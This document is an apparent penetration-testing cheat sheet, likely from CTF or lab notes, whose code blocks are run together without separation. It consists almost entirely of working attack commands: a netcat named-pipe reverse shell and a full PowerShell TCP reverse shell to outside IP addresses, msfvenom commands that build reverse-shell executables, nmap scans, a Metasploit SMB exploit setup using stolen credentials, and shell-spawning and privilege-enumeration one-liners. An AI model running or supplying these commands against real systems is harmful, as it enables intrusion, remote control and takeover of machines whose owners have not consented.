rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/fpowershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"msfvenom -l payloadsmsfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elfmsfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exeping <target_ip> # Look for TTL=128 or 32sudo nmap -v -O <target_ip>
sudo nmap -v -A <target_ip> # Aggressive scan# Start Metasploit
sudo msfconsole
# Search for exploit
search smb
# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>
# Execute
exploitpython -c 'import pty; pty.spawn("/bin/sh")'/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh";'
lua -e 'os.execute("/bin/sh")'
awk 'BEGIN {system("/bin/sh")}'vim -c ':!/bin/sh'
# Or in VIM:
:set shell=/bin/sh
:shell# File permissions
ls -la <path/to/file>
# Sudo permissions
sudo -l